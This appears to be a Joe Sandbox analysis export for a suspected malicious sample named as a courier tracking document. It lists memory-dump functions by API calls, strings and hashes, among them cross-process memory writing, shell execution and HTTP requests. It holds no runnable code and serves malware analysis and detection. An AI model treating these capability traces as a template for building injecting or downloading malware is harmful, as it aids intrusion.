                                      • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                      • API String ID: 708495834-557222456
                                      • Opcode ID: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                                      • Instruction ID: 9c514e09f8cb76db8ae150367893d7536957bb5c5403f45e3580b17af89e858a
                                      • Opcode Fuzzy Hash: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                                      • Instruction Fuzzy Hash: 7C917F711087009FC310EF65C88186BB7E8AF89314F148D2FF595672A2E778E919CB9B
                                      APIs
                                        • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                      • CoInitialize.OLE32(00000000), ref: 00478442
                                      • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0047845B
                                      • CoUninitialize.OLE32 ref: 0047863C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: CreateInitializeInstanceUninitialize_wcslen
                                      • String ID: .lnk
                                      • API String ID: 886957087-24824748
                                      • Opcode ID: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                                      • Instruction ID: cf4755465b87a828534c2837f83e1451e93ee4f6fe559e45c0b7480b45348b92
                                      • Opcode Fuzzy Hash: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                                      • Instruction Fuzzy Hash: 17816D70344301AFD210EB54CC82F5AB3E5AFC8B18F10896EF658DB2D1DAB5E945CB96
                                      APIs
                                        • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
                                      • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
                                        • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
                                        • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
                                        • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
                                        • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
                                      • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                      • String ID: @
                                      • API String ID: 4150878124-2766056989
                                      • Opcode ID: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                      • Instruction ID: 60a9f40d71a87185ad744a771aacdfc79ad0a16393efc777ae91d2f205fac39b
                                      • Opcode Fuzzy Hash: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                      • Instruction Fuzzy Hash: 0D51B972A00218ABCB10DFA5DD42FDEB778EFC9304F00459AFA05EB180D6B4BA45CB65
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: _memmove
                                      • String ID: \$]$h
                                      • API String ID: 4104443479-3262404753
                                      • Opcode ID: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                      • Instruction ID: f8aecd1968ad4f88b1990a67d2c0a139cd5c037738d7fdf96801fcbc28408ccb
                                      • Opcode Fuzzy Hash: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                      • Instruction Fuzzy Hash: 97518470E00209DFDF18CFA5C980AAEB7F2BF85304F29826AD405AB355D7385D45CB55
                                      APIs
                                      • ShellExecuteExW.SHELL32(0000003C), ref: 00457D67
                                        • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                        • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                      • CloseHandle.KERNEL32(?), ref: 00457E09
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: CloseExecuteHandleShell_wcscpy_wcslen
                                      • String ID: <$@
                                      • API String ID: 2417854910-1426351568
                                      • Opcode ID: 456975d6943100b9bccf6a944bdff1bb50055e47ea808eda8884d41227499f4e
                                      • Instruction ID: b88a15a70aa0ad5f6f29005b2a8070d35214d1ef645994392ec84fe4d9ca6df0
                                      • Opcode Fuzzy Hash: 456975d6943100b9bccf6a944bdff1bb50055e47ea808eda8884d41227499f4e
                                      • Instruction Fuzzy Hash: C751D3719002089BDB10EFA1D985AAFB7B4EF44309F10446EED05AB352DB79ED49CB94
                                      APIs
                                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
                                        • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                      Strings
                                      Similarity
                                      • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                                      • String ID:
                                      • API String ID: 3705125965-3916222277
                                      • Opcode ID: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                      • Instruction ID: d28fa13b4dde737238ce5dcfaacd3c540a76458eeabd88e5a6b3f8614e5f537b
                                      • Opcode Fuzzy Hash: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                      • Instruction Fuzzy Hash: DB310B76A802047AE720EF56DC42FDFB7A8EBD9710F00851FFA0097281D6B5550987AC
                                      APIs
                                      • GetMenuItemInfoW.USER32 ref: 0045FAC4
                                      • DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
                                      • DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
                                      Strings
                                      Similarity
                                      • API ID: Menu$Delete$InfoItem
                                      • String ID: 0
                                      • API String ID: 135850232-4108050209
                                      • Opcode ID: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                      • Instruction ID: 2caf7e1b7ae413ca61a5456c92b2eab9e90ede26a48057f627e29f4096114103
                                      • Opcode Fuzzy Hash: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                      • Instruction Fuzzy Hash: CC41D2B1604201ABD710CF25CC45F17B7A9AF84315F148A2EFDA49B2C2D378E849CBA6
                                      APIs
                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0045085F
                                      • GetWindowLongW.USER32(?,000000F0), ref: 0045087D
                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0045088E
                                      Strings
                                      Similarity
                                      • API ID: Window$Long
                                      • String ID: SysTreeView32
                                      • API String ID: 847901565-1698111956
                                      • Opcode ID: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                      • Instruction ID: 2f6c96d6d770cdd7f6b01965cae739f5ffbb06f7b8c4bfc7c6bf121f6b9a1f40
                                      • Opcode Fuzzy Hash: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                      • Instruction Fuzzy Hash: 34418D75500205ABEB10DF29DC84FEB33A8FB49325F20471AF865972D1D778E895CBA8
                                      APIs
                                      • LoadLibraryA.KERNEL32(?), ref: 00434B10
                                      • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
                                      • FreeLibrary.KERNEL32(?), ref: 00434B9F
                                      Strings
                                      Similarity
                                      • API ID: Library$AddressFreeLoadProc
                                      • String ID: AU3_GetPluginDetails
                                      • API String ID: 145871493-4132174516
                                      • Opcode ID: 525874d34911f66d3e6dd89a42f64d0fb8abb6a055dcd3ee386d4a3c405b38ac
                                      • Instruction ID: fc8523f5daf935d660d2a9c884068eb8da3e2fc1adb06f3317e0194b47a185ca
                                      • Opcode Fuzzy Hash: 525874d34911f66d3e6dd89a42f64d0fb8abb6a055dcd3ee386d4a3c405b38ac
                                      • Instruction Fuzzy Hash: C24107B9600605EFC710DF59D8C0E9AF7A5FF89304B1082AAEA1A8B311D735FD52CB95
                                      APIs
                                      • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00450DFD
                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00450E16
                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00450E3E
                                      Strings
                                      Similarity
                                      • API ID: MessageSend$Window
                                      • String ID: SysMonthCal32
                                      • API String ID: 2326795674-1439706946
                                      • Opcode ID: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                      • Instruction ID: 97bf4b40409f6c90460d1384a7672ac630dd7a2161d32aee0dcf483843136ede
                                      • Opcode Fuzzy Hash: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                      • Instruction Fuzzy Hash: A93195752002046BDB10DEA9DC85FEB73BDEB9C724F104619FA24A72C1D6B4FC558B64
                                      APIs
                                      • DestroyWindow.USER32(00000000), ref: 00450A2F
                                      Strings
                                      Similarity
                                      • API ID: DestroyWindow
                                      • String ID: msctls_updown32
                                      • API String ID: 3375834691-2298589950
                                      • Opcode ID: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                      • Instruction ID: fccd3fcc05e4e2aaf5990a1cc96ccc3c6d01ef6560d5fec67e6c7c3c5f699695
                                      • Opcode Fuzzy Hash: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                      • Instruction Fuzzy Hash: 213182767402056FE710DF58EC81FAB3368FF99710F10411AFA009B282C7B5AC96C7A8
                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: _memmove
                                      • String ID: $<
                                      • API String ID: 4104443479-428540627
                                      • Opcode ID: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                      • Instruction ID: e8c4ca86f7ae52158d8313b00b6d431508e51e3fea12eaab667d4a9530e7d8b8
                                      • Opcode Fuzzy Hash: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                      • Instruction Fuzzy Hash: A331EF30D04258DEFF25CFAAC9847EEBBB1AF11310F18419AD455A7382D7789E48CB25
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                      • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                      Strings
                                      Similarity
                                      • API ID: ErrorMode$DiskFreeSpace
                                      • String ID: \VH
                                      • API String ID: 1682464887-234962358
                                      • Opcode ID: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                      • Instruction ID: 72795a51c8fd7a71edb0939b11d44c3a5eb04741920228a3d2c34b8a4a3992bf
                                      • Opcode Fuzzy Hash: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                      • Instruction Fuzzy Hash: B5217171D002089FCB00EFA5D98499EBBB8FF48314F1184AAE805AB351D7349E05CB64
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                      • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                      Strings
                                      Similarity
                                      • API ID: ErrorMode$DiskFreeSpace
                                      • String ID: \VH
                                      • API String ID: 1682464887-234962358
                                      • Opcode ID: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                      • Instruction ID: ae55674c87016058c86dc8d4ad6f5a536cd264dc70ae423c542bf2f5a0a67e7a
                                      • Opcode Fuzzy Hash: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                      • Instruction Fuzzy Hash: C9316F75E002089FCB00EFA5D985A9DBBB4FF48314F1080AAE904AB351CB75EE05CB94
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D87B
                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D8F0
                                      • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D93A
                                      Strings
                                      Similarity
                                      • API ID: ErrorMode$DiskFreeSpace
                                      • String ID: \VH
                                      • API String ID: 1682464887-234962358
                                      • Opcode ID: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                      • Instruction ID: e5212c229d9c2069cdfe567d9572a18bb695f81ecf44ad0a977260396f8f3e20
                                      • Opcode Fuzzy Hash: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                      • Instruction Fuzzy Hash: E6316D75E002089FCB00EFA5D984A9EBBB4FF48314F1084AAE904AB351CB35DE05CB94
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D37E
                                      • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3F4
                                      • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D437
                                      Strings
                                      Similarity
                                      • API ID: ErrorMode$InformationVolume
                                      • String ID: \VH
                                      • API String ID: 2507767853-234962358
                                      • Opcode ID: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                      • Instruction ID: 9072e4f9bd6fffdf4d5f5b526d3ef1379cf95bcdbb04681c41660468616ecd75
                                      • Opcode Fuzzy Hash: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                      • Instruction Fuzzy Hash: E5213075A002099FC714EF95CD85EAEB7B8FF88300F1084AAE905A73A1D774EA45CB54
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D55C
                                      • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D5D2
                                      • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D608
                                      Strings
                                      Similarity
                                      • API ID: ErrorMode$InformationVolume
                                      • String ID: \VH
                                      • API String ID: 2507767853-234962358
                                      • Opcode ID: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                      • Instruction ID: 5d1496e5fec29648c5677f840c6a5ff7f703137340fc9510fe584f3610dc7e3a
                                      • Opcode Fuzzy Hash: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                      • Instruction Fuzzy Hash: 88218271A00209AFC714EF95C885EAEB7B4FF48300F0084AEF505A72A1D774E905CB58
                                      APIs
                                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450B3B
                                      • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450B51
                                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450B5F
                                      Strings
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID: msctls_trackbar32
                                      • API String ID: 3850602802-1010561917
                                      • Opcode ID: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                      • Instruction ID: cc80dcb7cd3031ad5716ab9229ca2671b5dcb2452333e47e40e099fef7a03d8b
                                      • Opcode Fuzzy Hash: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                      • Instruction Fuzzy Hash: 301196757403197BEB109EA8DC81FDB339CAB58B64F204216FA10A72C1D6B4FC5187A8
                                      APIs
                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                      • CLSIDFromString.OLE32(?,00000000), ref: 00435236
                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
                                      • String ID: crts
                                      • API String ID: 943502515-3724388283
                                      • Opcode ID: 1c951fdfbdf5c5f88c618ab4611406fe4b678f9348836ee2954194ca176c3974
                                      • Instruction ID: ec3ec3aa447b477297a9cb7ebc6a7fbeb91602aa87849f29064a6671b92f781e
                                      • Opcode Fuzzy Hash: 1c951fdfbdf5c5f88c618ab4611406fe4b678f9348836ee2954194ca176c3974
                                      • Instruction Fuzzy Hash: EC213876600A009FC714CF8AE444D97FBE8EF98760714C46AEA49CB721D334E851CB94
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D2D2
                                      • SetVolumeLabelW.KERNEL32(?,00000000), ref: 0045D331
                                      • SetErrorMode.KERNEL32(?), ref: 0045D35C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: ErrorMode$LabelVolume
                                      • String ID: \VH
                                      • API String ID: 2006950084-234962358
                                      • Opcode ID: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                      • Instruction ID: 93ef07912bcba266d24f4400c0aa25f887f93b2782b8649f9ae8f5902fc9f078
                                      • Opcode Fuzzy Hash: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                      • Instruction Fuzzy Hash: 10115175900105DFCB00EFA5D94499EBBB4FF48315B1084AAEC09AB352D774ED45CBA5
                                      APIs
                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                      • GetMenuItemInfoW.USER32 ref: 00449727
                                      • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00449751
                                      • DrawMenuBar.USER32 ref: 00449761
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Menu$InfoItem$Draw_malloc
                                      • String ID: 0
                                      • API String ID: 772068139-4108050209
                                      • Opcode ID: 1167fa92614d233b3003e6fb28f1152d6dc9f7ab2b98f531c98f2f78594b2958
                                      • Instruction ID: eb12e692e9d899ed3776fa10421b592e4983edb38958d2313c52402e3f8558b6
                                      • Opcode Fuzzy Hash: 1167fa92614d233b3003e6fb28f1152d6dc9f7ab2b98f531c98f2f78594b2958
                                      • Instruction Fuzzy Hash: 7711A3B1A10208AFEB10DF55DC49BAFB774EF85314F0041AEFA098B250DB759944DFA5
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: _wcslen$_wcscpy
                                      • String ID: 3, 3, 8, 1
                                      • API String ID: 3469035223-357260408
                                      • Opcode ID: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                      • Instruction ID: 583e1dd4926d5dc430cd1974fab242c37593855fc3f83b6d902887b8cb8118b3
                                      • Opcode Fuzzy Hash: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                      • Instruction Fuzzy Hash: 44F06D61510655E2CB34A791AD917FF72546F44341F00947BD90ED2190F368CB85CF99
                                      APIs
                                      • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
                                      • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: ICMP.DLL$IcmpCloseHandle
                                      • API String ID: 2574300362-3530519716
                                      • Opcode ID: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                      • Instruction ID: fe30dd6f995ef3e52e92cf139519288d45b371df6a06e7fbbc01cfddaae6e452
                                      • Opcode Fuzzy Hash: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                      • Instruction Fuzzy Hash: 89E01275500316DFDB105F66D80564B77DCDB14751F10482AFD45E2A51DBB8D48087E8
                                      APIs
                                      • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
                                      • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: ICMP.DLL$IcmpCreateFile
                                      • API String ID: 2574300362-275556492
                                      • Opcode ID: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                      • Instruction ID: 95e0d00128142f820e0a83de5ed484af687323a382b0c693d148963e73e99334
                                      • Opcode Fuzzy Hash: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                      • Instruction Fuzzy Hash: E3E0C270400306EFD7107FA5D81464A77E8DB08310F104C2AFC40A2650C7B8D48087A8
                                      APIs
                                      • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
                                      • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: ICMP.DLL$IcmpSendEcho
                                      • API String ID: 2574300362-58917771
                                      • Opcode ID: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                      • Instruction ID: f6e067919a3be2c94262fb81e38fb1c28335358536499f04279aa6303c0198c7
                                      • Opcode Fuzzy Hash: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                      • Instruction Fuzzy Hash: ADE0C2B0400706DFC7105F65D80465B77D8DB04321F10482BFD80E2610C7B8E48087A8
                                      APIs
                                      • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
                                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
